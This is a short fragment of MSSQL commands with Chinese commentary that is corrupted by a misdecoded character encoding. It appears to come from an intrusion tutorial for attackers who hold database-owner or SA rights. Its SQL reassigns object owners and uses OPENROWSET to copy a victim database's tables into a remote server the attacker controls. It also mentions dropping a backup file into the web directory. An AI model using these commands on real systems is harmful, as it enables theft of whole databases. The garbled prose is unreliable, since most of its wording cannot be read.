EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/
40DB_OWNERȨµݿⱸݷ
openrowsetɡԼݿ~ڱؽĿһṹı~ֶʹnvarchar.ȻúӶԷSQLݿ⣬ڲѯִ
insert into OPENROWSET ('sqloledb','server=ݿIP;uid=user;pwd=pass;database=dbname;','select * from 㽨ı) select * from Էı
Ҫ̫ĻͿݿûԶŵֶ.select * from where id>100
Ū
ҪǺWEB̨ͬĻֱӽBAKWEBĿ¼»OKǰⲻ̫2GĻSQLͳʱ
SAȨASPݿ⣺ɷASPMSSQLݿ